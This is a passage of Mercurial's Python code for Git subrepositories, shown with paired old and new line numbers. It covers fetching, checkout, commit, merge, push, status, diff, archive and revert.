1497 def _gitupdatestat(self):
1501 def _gitupdatestat(self):
1498 """This must be run before git diff-index.
1502 """This must be run before git diff-index.
1499 diff-index only looks at changes to file stat;
1503 diff-index only looks at changes to file stat;
1500 this command looks at file contents and updates the stat."""
1504 this command looks at file contents and updates the stat."""
1501 self._gitcommand(['update-index', '-q', '--refresh'])
1505 self._gitcommand(['update-index', '-q', '--refresh'])
1502
1506
1503 def _gitbranchmap(self):
1507 def _gitbranchmap(self):
1504 '''returns 2 things:
1508 '''returns 2 things:
1505 a map from git branch to revision
1509 a map from git branch to revision
1506 a map from revision to branches'''
1510 a map from revision to branches'''
1507 branch2rev = {}
1511 branch2rev = {}
1508 rev2branch = {}
1512 rev2branch = {}
1509
1513
1510 out = self._gitcommand(['for-each-ref', '--format',
1514 out = self._gitcommand(['for-each-ref', '--format',
1511 '%(objectname) %(refname)'])
1515 '%(objectname) %(refname)'])
1512 for line in out.split('\n'):
1516 for line in out.split('\n'):
1513 revision, ref = line.split(' ')
1517 revision, ref = line.split(' ')
1514 if (not ref.startswith('refs/heads/') and
1518 if (not ref.startswith('refs/heads/') and
1515 not ref.startswith('refs/remotes/')):
1519 not ref.startswith('refs/remotes/')):
1516 continue
1520 continue
1517 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1521 if ref.startswith('refs/remotes/') and ref.endswith('/HEAD'):
1518 continue # ignore remote/HEAD redirects
1522 continue # ignore remote/HEAD redirects
1519 branch2rev[ref] = revision
1523 branch2rev[ref] = revision
1520 rev2branch.setdefault(revision, []).append(ref)
1524 rev2branch.setdefault(revision, []).append(ref)
1521 return branch2rev, rev2branch
1525 return branch2rev, rev2branch
1522
1526
1523 def _gittracking(self, branches):
1527 def _gittracking(self, branches):
1524 'return map of remote branch to local tracking branch'
1528 'return map of remote branch to local tracking branch'
1525 # assumes no more than one local tracking branch for each remote
1529 # assumes no more than one local tracking branch for each remote
1526 tracking = {}
1530 tracking = {}
1527 for b in branches:
1531 for b in branches:
1528 if b.startswith('refs/remotes/'):
1532 if b.startswith('refs/remotes/'):
1529 continue
1533 continue
1530 bname = b.split('/', 2)[2]
1534 bname = b.split('/', 2)[2]
1531 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1535 remote = self._gitcommand(['config', 'branch.%s.remote' % bname])
1532 if remote:
1536 if remote:
1533 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1537 ref = self._gitcommand(['config', 'branch.%s.merge' % bname])
1534 tracking['refs/remotes/%s/%s' %
1538 tracking['refs/remotes/%s/%s' %
1535 (remote, ref.split('/', 2)[2])] = b
1539 (remote, ref.split('/', 2)[2])] = b
1536 return tracking
1540 return tracking
1537
1541
1538 def _abssource(self, source):
1542 def _abssource(self, source):
1539 if '://' not in source:
1543 if '://' not in source:
1540 # recognize the scp syntax as an absolute source
1544 # recognize the scp syntax as an absolute source
1541 colon = source.find(':')
1545 colon = source.find(':')
1542 if colon != -1 and '/' not in source[:colon]:
1546 if colon != -1 and '/' not in source[:colon]:
1543 return source
1547 return source
1544 self._subsource = source
1548 self._subsource = source
1545 return _abssource(self)
1549 return _abssource(self)
1546
1550
1547 def _fetch(self, source, revision):
1551 def _fetch(self, source, revision):
1548 if self._gitmissing():
1552 if self._gitmissing():
1549 source = self._abssource(source)
1553 source = self._abssource(source)
1550 self.ui.status(_('cloning subrepo %s from %s\n') %
1554 self.ui.status(_('cloning subrepo %s from %s\n') %
1551 (self._relpath, source))
1555 (self._relpath, source))
1552 self._gitnodir(['clone', source, self._abspath])
1556 self._gitnodir(['clone', source, self._abspath])
1553 if self._githavelocally(revision):
1557 if self._githavelocally(revision):
1554 return
1558 return
1555 self.ui.status(_('pulling subrepo %s from %s\n') %
1559 self.ui.status(_('pulling subrepo %s from %s\n') %
1556 (self._relpath, self._gitremote('origin')))
1560 (self._relpath, self._gitremote('origin')))
1557 # try only origin: the originally cloned repo
1561 # try only origin: the originally cloned repo
1558 self._gitcommand(['fetch'])
1562 self._gitcommand(['fetch'])
1559 if not self._githavelocally(revision):
1563 if not self._githavelocally(revision):
1560 raise error.Abort(_('revision %s does not exist in subrepository '
1564 raise error.Abort(_('revision %s does not exist in subrepository '
1561 '"%s"\n') % (revision, self._relpath))
1565 '"%s"\n') % (revision, self._relpath))
1562
1566
1563 @annotatesubrepoerror
1567 @annotatesubrepoerror
1564 def dirty(self, ignoreupdate=False, missing=False):
1568 def dirty(self, ignoreupdate=False, missing=False):
1565 if self._gitmissing():
1569 if self._gitmissing():
1566 return self._state[1] != ''
1570 return self._state[1] != ''
1567 if self._gitisbare():
1571 if self._gitisbare():
1568 return True
1572 return True
1569 if not ignoreupdate and self._state[1] != self._gitstate():
1573 if not ignoreupdate and self._state[1] != self._gitstate():
1570 # different version checked out
1574 # different version checked out
1571 return True
1575 return True
1572 # check for staged changes or modified files; ignore untracked files
1576 # check for staged changes or modified files; ignore untracked files
1573 self._gitupdatestat()
1577 self._gitupdatestat()
1574 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1578 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1575 return code == 1
1579 return code == 1
1576
1580
1577 def basestate(self):
1581 def basestate(self):
1578 return self._gitstate()
1582 return self._gitstate()
1579
1583
1580 @annotatesubrepoerror
1584 @annotatesubrepoerror
1581 def get(self, state, overwrite=False):
1585 def get(self, state, overwrite=False):
1582 source, revision, kind = state
1586 source, revision, kind = state
1583 if not revision:
1587 if not revision:
1584 self.remove()
1588 self.remove()
1585 return
1589 return
1586 self._fetch(source, revision)
1590 self._fetch(source, revision)
1587 # if the repo was set to be bare, unbare it
1591 # if the repo was set to be bare, unbare it
1588 if self._gitisbare():
1592 if self._gitisbare():
1589 self._gitcommand(['config', 'core.bare', 'false'])
1593 self._gitcommand(['config', 'core.bare', 'false'])
1590 if self._gitstate() == revision:
1594 if self._gitstate() == revision:
1591 self._gitcommand(['reset', '--hard', 'HEAD'])
1595 self._gitcommand(['reset', '--hard', 'HEAD'])
1592 return
1596 return
1593 elif self._gitstate() == revision:
1597 elif self._gitstate() == revision:
1594 if overwrite:
1598 if overwrite:
1595 # first reset the index to unmark new files for commit, because
1599 # first reset the index to unmark new files for commit, because
1596 # reset --hard will otherwise throw away files added for commit,
1600 # reset --hard will otherwise throw away files added for commit,
1597 # not just unmark them.
1601 # not just unmark them.
1598 self._gitcommand(['reset', 'HEAD'])
1602 self._gitcommand(['reset', 'HEAD'])
1599 self._gitcommand(['reset', '--hard', 'HEAD'])
1603 self._gitcommand(['reset', '--hard', 'HEAD'])
1600 return
1604 return
1601 branch2rev, rev2branch = self._gitbranchmap()
1605 branch2rev, rev2branch = self._gitbranchmap()
1602
1606
1603 def checkout(args):
1607 def checkout(args):
1604 cmd = ['checkout']
1608 cmd = ['checkout']
1605 if overwrite:
1609 if overwrite:
1606 # first reset the index to unmark new files for commit, because
1610 # first reset the index to unmark new files for commit, because
1607 # the -f option will otherwise throw away files added for
1611 # the -f option will otherwise throw away files added for
1608 # commit, not just unmark them.
1612 # commit, not just unmark them.
1609 self._gitcommand(['reset', 'HEAD'])
1613 self._gitcommand(['reset', 'HEAD'])
1610 cmd.append('-f')
1614 cmd.append('-f')
1611 self._gitcommand(cmd + args)
1615 self._gitcommand(cmd + args)
1612 _sanitize(self.ui, self.wvfs, '.git')
1616 _sanitize(self.ui, self.wvfs, '.git')
1613
1617
1614 def rawcheckout():
1618 def rawcheckout():
1615 # no branch to checkout, check it out with no branch
1619 # no branch to checkout, check it out with no branch
1616 self.ui.warn(_('checking out detached HEAD in '
1620 self.ui.warn(_('checking out detached HEAD in '
1617 'subrepository "%s"\n') % self._relpath)
1621 'subrepository "%s"\n') % self._relpath)
1618 self.ui.warn(_('check out a git branch if you intend '
1622 self.ui.warn(_('check out a git branch if you intend '
1619 'to make changes\n'))
1623 'to make changes\n'))
1620 checkout(['-q', revision])
1624 checkout(['-q', revision])
1621
1625
1622 if revision not in rev2branch:
1626 if revision not in rev2branch:
1623 rawcheckout()
1627 rawcheckout()
1624 return
1628 return
1625 branches = rev2branch[revision]
1629 branches = rev2branch[revision]
1626 firstlocalbranch = None
1630 firstlocalbranch = None
1627 for b in branches:
1631 for b in branches:
1628 if b == 'refs/heads/master':
1632 if b == 'refs/heads/master':
1629 # master trumps all other branches
1633 # master trumps all other branches
1630 checkout(['refs/heads/master'])
1634 checkout(['refs/heads/master'])
1631 return
1635 return
1632 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1636 if not firstlocalbranch and not b.startswith('refs/remotes/'):
1633 firstlocalbranch = b
1637 firstlocalbranch = b
1634 if firstlocalbranch:
1638 if firstlocalbranch:
1635 checkout([firstlocalbranch])
1639 checkout([firstlocalbranch])
1636 return
1640 return
1637
1641
1638 tracking = self._gittracking(branch2rev.keys())
1642 tracking = self._gittracking(branch2rev.keys())
1639 # choose a remote branch already tracked if possible
1643 # choose a remote branch already tracked if possible
1640 remote = branches[0]
1644 remote = branches[0]
1641 if remote not in tracking:
1645 if remote not in tracking:
1642 for b in branches:
1646 for b in branches:
1643 if b in tracking:
1647 if b in tracking:
1644 remote = b
1648 remote = b
1645 break
1649 break
1646
1650
1647 if remote not in tracking:
1651 if remote not in tracking:
1648 # create a new local tracking branch
1652 # create a new local tracking branch
1649 local = remote.split('/', 3)[3]
1653 local = remote.split('/', 3)[3]
1650 checkout(['-b', local, remote])
1654 checkout(['-b', local, remote])
1651 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1655 elif self._gitisancestor(branch2rev[tracking[remote]], remote):
1652 # When updating to a tracked remote branch,
1656 # When updating to a tracked remote branch,
1653 # if the local tracking branch is downstream of it,
1657 # if the local tracking branch is downstream of it,
1654 # a normal `git pull` would have performed a "fast-forward merge"
1658 # a normal `git pull` would have performed a "fast-forward merge"
1655 # which is equivalent to updating the local branch to the remote.
1659 # which is equivalent to updating the local branch to the remote.
1656 # Since we are only looking at branching at update, we need to
1660 # Since we are only looking at branching at update, we need to
1657 # detect this situation and perform this action lazily.
1661 # detect this situation and perform this action lazily.
1658 if tracking[remote] != self._gitcurrentbranch():
1662 if tracking[remote] != self._gitcurrentbranch():
1659 checkout([tracking[remote]])
1663 checkout([tracking[remote]])
1660 self._gitcommand(['merge', '--ff', remote])
1664 self._gitcommand(['merge', '--ff', remote])
1661 _sanitize(self.ui, self.wvfs, '.git')
1665 _sanitize(self.ui, self.wvfs, '.git')
1662 else:
1666 else:
1663 # a real merge would be required, just checkout the revision
1667 # a real merge would be required, just checkout the revision
1664 rawcheckout()
1668 rawcheckout()
1665
1669
1666 @annotatesubrepoerror
1670 @annotatesubrepoerror
1667 def commit(self, text, user, date):
1671 def commit(self, text, user, date):
1668 if self._gitmissing():
1672 if self._gitmissing():
1669 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1673 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1670 cmd = ['commit', '-a', '-m', text]
1674 cmd = ['commit', '-a', '-m', text]
1671 env = encoding.environ.copy()
1675 env = encoding.environ.copy()
1672 if user:
1676 if user:
1673 cmd += ['--author', user]
1677 cmd += ['--author', user]
1674 if date:
1678 if date:
1675 # git's date parser silently ignores when seconds < 1e9
1679 # git's date parser silently ignores when seconds < 1e9
1676 # convert to ISO8601
1680 # convert to ISO8601
1677 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1681 env['GIT_AUTHOR_DATE'] = util.datestr(date,
1678 '%Y-%m-%dT%H:%M:%S %1%2')
1682 '%Y-%m-%dT%H:%M:%S %1%2')
1679 self._gitcommand(cmd, env=env)
1683 self._gitcommand(cmd, env=env)
1680 # make sure commit works otherwise HEAD might not exist under certain
1684 # make sure commit works otherwise HEAD might not exist under certain
1681 # circumstances
1685 # circumstances
1682 return self._gitstate()
1686 return self._gitstate()
1683
1687
1684 @annotatesubrepoerror
1688 @annotatesubrepoerror
1685 def merge(self, state):
1689 def merge(self, state):
1686 source, revision, kind = state
1690 source, revision, kind = state
1687 self._fetch(source, revision)
1691 self._fetch(source, revision)
1688 base = self._gitcommand(['merge-base', revision, self._state[1]])
1692 base = self._gitcommand(['merge-base', revision, self._state[1]])
1689 self._gitupdatestat()
1693 self._gitupdatestat()
1690 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1694 out, code = self._gitdir(['diff-index', '--quiet', 'HEAD'])
1691
1695
1692 def mergefunc():
1696 def mergefunc():
1693 if base == revision:
1697 if base == revision:
1694 self.get(state) # fast forward merge
1698 self.get(state) # fast forward merge
1695 elif base != self._state[1]:
1699 elif base != self._state[1]:
1696 self._gitcommand(['merge', '--no-commit', revision])
1700 self._gitcommand(['merge', '--no-commit', revision])
1697 _sanitize(self.ui, self.wvfs, '.git')
1701 _sanitize(self.ui, self.wvfs, '.git')
1698
1702
1699 if self.dirty():
1703 if self.dirty():
1700 if self._gitstate() != revision:
1704 if self._gitstate() != revision:
1701 dirty = self._gitstate() == self._state[1] or code != 0
1705 dirty = self._gitstate() == self._state[1] or code != 0
1702 if _updateprompt(self.ui, self, dirty,
1706 if _updateprompt(self.ui, self, dirty,
1703 self._state[1][:7], revision[:7]):
1707 self._state[1][:7], revision[:7]):
1704 mergefunc()
1708 mergefunc()
1705 else:
1709 else:
1706 mergefunc()
1710 mergefunc()
1707
1711
1708 @annotatesubrepoerror
1712 @annotatesubrepoerror
1709 def push(self, opts):
1713 def push(self, opts):
1710 force = opts.get('force')
1714 force = opts.get('force')
1711
1715
1712 if not self._state[1]:
1716 if not self._state[1]:
1713 return True
1717 return True
1714 if self._gitmissing():
1718 if self._gitmissing():
1715 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1719 raise error.Abort(_("subrepo %s is missing") % self._relpath)
1716 # if a branch in origin contains the revision, nothing to do
1720 # if a branch in origin contains the revision, nothing to do
1717 branch2rev, rev2branch = self._gitbranchmap()
1721 branch2rev, rev2branch = self._gitbranchmap()
1718 if self._state[1] in rev2branch:
1722 if self._state[1] in rev2branch:
1719 for b in rev2branch[self._state[1]]:
1723 for b in rev2branch[self._state[1]]:
1720 if b.startswith('refs/remotes/origin/'):
1724 if b.startswith('refs/remotes/origin/'):
1721 return True
1725 return True
1722 for b, revision in branch2rev.iteritems():
1726 for b, revision in branch2rev.iteritems():
1723 if b.startswith('refs/remotes/origin/'):
1727 if b.startswith('refs/remotes/origin/'):
1724 if self._gitisancestor(self._state[1], revision):
1728 if self._gitisancestor(self._state[1], revision):
1725 return True
1729 return True
1726 # otherwise, try to push the currently checked out branch
1730 # otherwise, try to push the currently checked out branch
1727 cmd = ['push']
1731 cmd = ['push']
1728 if force:
1732 if force:
1729 cmd.append('--force')
1733 cmd.append('--force')
1730
1734
1731 current = self._gitcurrentbranch()
1735 current = self._gitcurrentbranch()
1732 if current:
1736 if current:
1733 # determine if the current branch is even useful
1737 # determine if the current branch is even useful
1734 if not self._gitisancestor(self._state[1], current):
1738 if not self._gitisancestor(self._state[1], current):
1735 self.ui.warn(_('unrelated git branch checked out '
1739 self.ui.warn(_('unrelated git branch checked out '
1736 'in subrepository "%s"\n') % self._relpath)
1740 'in subrepository "%s"\n') % self._relpath)
1737 return False
1741 return False
1738 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1742 self.ui.status(_('pushing branch %s of subrepository "%s"\n') %
1739 (current.split('/', 2)[2], self._relpath))
1743 (current.split('/', 2)[2], self._relpath))
1740 ret = self._gitdir(cmd + ['origin', current])
1744 ret = self._gitdir(cmd + ['origin', current])
1741 return ret[1] == 0
1745 return ret[1] == 0
1742 else:
1746 else:
1743 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1747 self.ui.warn(_('no branch checked out in subrepository "%s"\n'
1744 'cannot push revision %s\n') %
1748 'cannot push revision %s\n') %
1745 (self._relpath, self._state[1]))
1749 (self._relpath, self._state[1]))
1746 return False
1750 return False
1747
1751
1748 @annotatesubrepoerror
1752 @annotatesubrepoerror
1749 def add(self, ui, match, prefix, explicitonly, **opts):
1753 def add(self, ui, match, prefix, explicitonly, **opts):
1750 if self._gitmissing():
1754 if self._gitmissing():
1751 return []
1755 return []
1752
1756
1753 (modified, added, removed,
1757 (modified, added, removed,
1754 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1758 deleted, unknown, ignored, clean) = self.status(None, unknown=True,
1755 clean=True)
1759 clean=True)
1756
1760
1757 tracked = set()
1761 tracked = set()
1758 # dirstates 'amn' warn, 'r' is added again
1762 # dirstates 'amn' warn, 'r' is added again
1759 for l in (modified, added, deleted, clean):
1763 for l in (modified, added, deleted, clean):
1760 tracked.update(l)
1764 tracked.update(l)
1761
1765
1762 # Unknown files not of interest will be rejected by the matcher
1766 # Unknown files not of interest will be rejected by the matcher
1763 files = unknown
1767 files = unknown
1764 files.extend(match.files())
1768 files.extend(match.files())
1765
1769
1766 rejected = []
1770 rejected = []
1767
1771
1768 files = [f for f in sorted(set(files)) if match(f)]
1772 files = [f for f in sorted(set(files)) if match(f)]
1769 for f in files:
1773 for f in files:
1770 exact = match.exact(f)
1774 exact = match.exact(f)
1771 command = ["add"]
1775 command = ["add"]
1772 if exact:
1776 if exact:
1773 command.append("-f") #should be added, even if ignored
1777 command.append("-f") #should be added, even if ignored
1774 if ui.verbose or not exact:
1778 if ui.verbose or not exact:
1775 ui.status(_('adding %s\n') % match.rel(f))
1779 ui.status(_('adding %s\n') % match.rel(f))
1776
1780
1777 if f in tracked: # hg prints 'adding' even if already tracked
1781 if f in tracked: # hg prints 'adding' even if already tracked
1778 if exact:
1782 if exact:
1779 rejected.append(f)
1783 rejected.append(f)
1780 continue
1784 continue
1781 if not opts.get(r'dry_run'):
1785 if not opts.get(r'dry_run'):
1782 self._gitcommand(command + [f])
1786 self._gitcommand(command + [f])
1783
1787
1784 for f in rejected:
1788 for f in rejected:
1785 ui.warn(_("%s already tracked!\n") % match.abs(f))
1789 ui.warn(_("%s already tracked!\n") % match.abs(f))
1786
1790
1787 return rejected
1791 return rejected
1788
1792
1789 @annotatesubrepoerror
1793 @annotatesubrepoerror
1790 def remove(self):
1794 def remove(self):
1791 if self._gitmissing():
1795 if self._gitmissing():
1792 return
1796 return
1793 if self.dirty():
1797 if self.dirty():
1794 self.ui.warn(_('not removing repo %s because '
1798 self.ui.warn(_('not removing repo %s because '
1795 'it has changes.\n') % self._relpath)
1799 'it has changes.\n') % self._relpath)
1796 return
1800 return
1797 # we can't fully delete the repository as it may contain
1801 # we can't fully delete the repository as it may contain
1798 # local-only history
1802 # local-only history
1799 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1803 self.ui.note(_('removing subrepo %s\n') % self._relpath)
1800 self._gitcommand(['config', 'core.bare', 'true'])
1804 self._gitcommand(['config', 'core.bare', 'true'])
1801 for f, kind in self.wvfs.readdir():
1805 for f, kind in self.wvfs.readdir():
1802 if f == '.git':
1806 if f == '.git':
1803 continue
1807 continue
1804 if kind == stat.S_IFDIR:
1808 if kind == stat.S_IFDIR:
1805 self.wvfs.rmtree(f)
1809 self.wvfs.rmtree(f)
1806 else:
1810 else:
1807 self.wvfs.unlink(f)
1811 self.wvfs.unlink(f)
1808
1812
1809 def archive(self, archiver, prefix, match=None, decode=True):
1813 def archive(self, archiver, prefix, match=None, decode=True):
1810 total = 0
1814 total = 0
1811 source, revision = self._state
1815 source, revision = self._state
1812 if not revision:
1816 if not revision:
1813 return total
1817 return total
1814 self._fetch(source, revision)
1818 self._fetch(source, revision)
1815
1819
1816 # Parse git's native archive command.
1820 # Parse git's native archive command.
1817 # This should be much faster than manually traversing the trees
1821 # This should be much faster than manually traversing the trees
1818 # and objects with many subprocess calls.
1822 # and objects with many subprocess calls.
1819 tarstream = self._gitcommand(['archive', revision], stream=True)
1823 tarstream = self._gitcommand(['archive', revision], stream=True)
1820 tar = tarfile.open(fileobj=tarstream, mode='r|')
1824 tar = tarfile.open(fileobj=tarstream, mode='r|')
1821 relpath = subrelpath(self)
1825 relpath = subrelpath(self)
1822 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1826 self.ui.progress(_('archiving (%s)') % relpath, 0, unit=_('files'))
1823 for i, info in enumerate(tar):
1827 for i, info in enumerate(tar):
1824 if info.isdir():
1828 if info.isdir():
1825 continue
1829 continue
1826 if match and not match(info.name):
1830 if match and not match(info.name):
1827 continue
1831 continue
1828 if info.issym():
1832 if info.issym():
1829 data = info.linkname
1833 data = info.linkname
1830 else:
1834 else:
1831 data = tar.extractfile(info).read()
1835 data = tar.extractfile(info).read()
1832 archiver.addfile(prefix + self._path + '/' + info.name,
1836 archiver.addfile(prefix + self._path + '/' + info.name,
1833 info.mode, info.issym(), data)
1837 info.mode, info.issym(), data)
1834 total += 1
1838 total += 1
1835 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1839 self.ui.progress(_('archiving (%s)') % relpath, i + 1,
1836 unit=_('files'))
1840 unit=_('files'))
1837 self.ui.progress(_('archiving (%s)') % relpath, None)
1841 self.ui.progress(_('archiving (%s)') % relpath, None)
1838 return total
1842 return total
1839
1843
1840
1844
1841 @annotatesubrepoerror
1845 @annotatesubrepoerror
1842 def cat(self, match, fm, fntemplate, prefix, **opts):
1846 def cat(self, match, fm, fntemplate, prefix, **opts):
1843 rev = self._state[1]
1847 rev = self._state[1]
1844 if match.anypats():
1848 if match.anypats():
1845 return 1 #No support for include/exclude yet
1849 return 1 #No support for include/exclude yet
1846
1850
1847 if not match.files():
1851 if not match.files():
1848 return 1
1852 return 1
1849
1853
1850 # TODO: add support for non-plain formatter (see cmdutil.cat())
1854 # TODO: add support for non-plain formatter (see cmdutil.cat())
1851 for f in match.files():
1855 for f in match.files():
1852 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1856 output = self._gitcommand(["show", "%s:%s" % (rev, f)])
1853 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1857 fp = cmdutil.makefileobj(self._subparent, fntemplate,
1854 self._ctx.node(),
1858 self._ctx.node(),
1855 pathname=self.wvfs.reljoin(prefix, f))
1859 pathname=self.wvfs.reljoin(prefix, f))
1856 fp.write(output)
1860 fp.write(output)
1857 fp.close()
1861 fp.close()
1858 return 0
1862 return 0
1859
1863
1860
1864
1861 @annotatesubrepoerror
1865 @annotatesubrepoerror
1862 def status(self, rev2, **opts):
1866 def status(self, rev2, **opts):
1863 rev1 = self._state[1]
1867 rev1 = self._state[1]
1864 if self._gitmissing() or not rev1:
1868 if self._gitmissing() or not rev1:
1865 # if the repo is missing, return no results
1869 # if the repo is missing, return no results
1866 return scmutil.status([], [], [], [], [], [], [])
1870 return scmutil.status([], [], [], [], [], [], [])
1867 modified, added, removed = [], [], []
1871 modified, added, removed = [], [], []
1868 self._gitupdatestat()
1872 self._gitupdatestat()
1869 if rev2:
1873 if rev2:
1870 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1874 command = ['diff-tree', '--no-renames', '-r', rev1, rev2]
1871 else:
1875 else:
1872 command = ['diff-index', '--no-renames', rev1]
1876 command = ['diff-index', '--no-renames', rev1]
1873 out = self._gitcommand(command)
1877 out = self._gitcommand(command)
1874 for line in out.split('\n'):
1878 for line in out.split('\n'):
1875 tab = line.find('\t')
1879 tab = line.find('\t')
1876 if tab == -1:
1880 if tab == -1:
1877 continue
1881 continue
1878 status, f = line[tab - 1], line[tab + 1:]
1882 status, f = line[tab - 1], line[tab + 1:]
1879 if status == 'M':
1883 if status == 'M':
1880 modified.append(f)
1884 modified.append(f)
1881 elif status == 'A':
1885 elif status == 'A':
1882 added.append(f)
1886 added.append(f)
1883 elif status == 'D':
1887 elif status == 'D':
1884 removed.append(f)
1888 removed.append(f)
1885
1889
1886 deleted, unknown, ignored, clean = [], [], [], []
1890 deleted, unknown, ignored, clean = [], [], [], []
1887
1891
1888 command = ['status', '--porcelain', '-z']
1892 command = ['status', '--porcelain', '-z']
1889 if opts.get(r'unknown'):
1893 if opts.get(r'unknown'):
1890 command += ['--untracked-files=all']
1894 command += ['--untracked-files=all']
1891 if opts.get(r'ignored'):
1895 if opts.get(r'ignored'):
1892 command += ['--ignored']
1896 command += ['--ignored']
1893 out = self._gitcommand(command)
1897 out = self._gitcommand(command)
1894
1898
1895 changedfiles = set()
1899 changedfiles = set()
1896 changedfiles.update(modified)
1900 changedfiles.update(modified)
1897 changedfiles.update(added)
1901 changedfiles.update(added)
1898 changedfiles.update(removed)
1902 changedfiles.update(removed)
1899 for line in out.split('\0'):
1903 for line in out.split('\0'):
1900 if not line:
1904 if not line:
1901 continue
1905 continue
1902 st = line[0:2]
1906 st = line[0:2]
1903 #moves and copies show 2 files on one line
1907 #moves and copies show 2 files on one line
1904 if line.find('\0') >= 0:
1908 if line.find('\0') >= 0:
1905 filename1, filename2 = line[3:].split('\0')
1909 filename1, filename2 = line[3:].split('\0')
1906 else:
1910 else:
1907 filename1 = line[3:]
1911 filename1 = line[3:]
1908 filename2 = None
1912 filename2 = None
1909
1913
1910 changedfiles.add(filename1)
1914 changedfiles.add(filename1)
1911 if filename2:
1915 if filename2:
1912 changedfiles.add(filename2)
1916 changedfiles.add(filename2)
1913
1917
1914 if st == '??':
1918 if st == '??':
1915 unknown.append(filename1)
1919 unknown.append(filename1)
1916 elif st == '!!':
1920 elif st == '!!':
1917 ignored.append(filename1)
1921 ignored.append(filename1)
1918
1922
1919 if opts.get(r'clean'):
1923 if opts.get(r'clean'):
1920 out = self._gitcommand(['ls-files'])
1924 out = self._gitcommand(['ls-files'])
1921 for f in out.split('\n'):
1925 for f in out.split('\n'):
1922 if not f in changedfiles:
1926 if not f in changedfiles:
1923 clean.append(f)
1927 clean.append(f)
1924
1928
1925 return scmutil.status(modified, added, removed, deleted,
1929 return scmutil.status(modified, added, removed, deleted,
1926 unknown, ignored, clean)
1930 unknown, ignored, clean)
1927
1931
1928 @annotatesubrepoerror
1932 @annotatesubrepoerror
1929 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1933 def diff(self, ui, diffopts, node2, match, prefix, **opts):
1930 node1 = self._state[1]
1934 node1 = self._state[1]
1931 cmd = ['diff', '--no-renames']
1935 cmd = ['diff', '--no-renames']
1932 if opts[r'stat']:
1936 if opts[r'stat']:
1933 cmd.append('--stat')
1937 cmd.append('--stat')
1934 else:
1938 else:
1935 # for Git, this also implies '-p'
1939 # for Git, this also implies '-p'
1936 cmd.append('-U%d' % diffopts.context)
1940 cmd.append('-U%d' % diffopts.context)
1937
1941
1938 gitprefix = self.wvfs.reljoin(prefix, self._path)
1942 gitprefix = self.wvfs.reljoin(prefix, self._path)
1939
1943
1940 if diffopts.noprefix:
1944 if diffopts.noprefix:
1941 cmd.extend(['--src-prefix=%s/' % gitprefix,
1945 cmd.extend(['--src-prefix=%s/' % gitprefix,
1942 '--dst-prefix=%s/' % gitprefix])
1946 '--dst-prefix=%s/' % gitprefix])
1943 else:
1947 else:
1944 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1948 cmd.extend(['--src-prefix=a/%s/' % gitprefix,
1945 '--dst-prefix=b/%s/' % gitprefix])
1949 '--dst-prefix=b/%s/' % gitprefix])
1946
1950
1947 if diffopts.ignorews:
1951 if diffopts.ignorews:
1948 cmd.append('--ignore-all-space')
1952 cmd.append('--ignore-all-space')
1949 if diffopts.ignorewsamount:
1953 if diffopts.ignorewsamount:
1950 cmd.append('--ignore-space-change')
1954 cmd.append('--ignore-space-change')
1951 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1955 if self._gitversion(self._gitcommand(['--version'])) >= (1, 8, 4) \
1952 and diffopts.ignoreblanklines:
1956 and diffopts.ignoreblanklines:
1953 cmd.append('--ignore-blank-lines')
1957 cmd.append('--ignore-blank-lines')
1954
1958
1955 cmd.append(node1)
1959 cmd.append(node1)
1956 if node2:
1960 if node2:
1957 cmd.append(node2)
1961 cmd.append(node2)
1958
1962
1959 output = ""
1963 output = ""
1960 if match.always():
1964 if match.always():
1961 output += self._gitcommand(cmd) + '\n'
1965 output += self._gitcommand(cmd) + '\n'
1962 else:
1966 else:
1963 st = self.status(node2)[:3]
1967 st = self.status(node2)[:3]
1964 files = [f for sublist in st for f in sublist]
1968 files = [f for sublist in st for f in sublist]
1965 for f in files:
1969 for f in files:
1966 if match(f):
1970 if match(f):
1967 output += self._gitcommand(cmd + ['--', f]) + '\n'
1971 output += self._gitcommand(cmd + ['--', f]) + '\n'
1968
1972
1969 if output.strip():
1973 if output.strip():
1970 ui.write(output)
1974 ui.write(output)
1971
1975
1972 @annotatesubrepoerror
1976 @annotatesubrepoerror
1973 def revert(self, substate, *pats, **opts):
1977 def revert(self, substate, *pats, **opts):
1974 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1978 self.ui.status(_('reverting subrepo %s\n') % substate[0])
1975 if not opts.get(r'no_backup'):
1979 if not opts.get(r'no_backup'):
1976 status = self.status(None)
1980 status = self.status(None)
1977 names = status.modified
1981 names = status.modified
1978 for name in names:
1982 for name in names:
1979 bakname = scmutil.origpath(self.ui, self._subparent, name)
1983 bakname = scmutil.origpath(self.ui, self._subparent, name)
1980 self.ui.note(_('saving current version of %s as %s\n') %
1984 self.ui.note(_('saving current version of %s as %s\n') %
1981 (name, bakname))
1985 (name, bakname))
1982 self.wvfs.rename(name, bakname)
1986 self.wvfs.rename(name, bakname)
1983
1987
1984 if not opts.get(r'dry_run'):
1988 if not opts.get(r'dry_run'):
1985 self.get(substate, overwrite=True)
1989 self.get(substate, overwrite=True)
1986 return []
1990 return []
1987
1991
1988 def shortid(self, revid):
1992 def shortid(self, revid):
1989 return revid[:7]
1993 return revid[:7]
1990
1994
1991 types = {
1995 types = {
1992 'hg': hgsubrepo,
1996 'hg': hgsubrepo,
1993 'svn': svnsubrepo,
1997 'svn': svnsubrepo,
1994 'git': gitsubrepo,
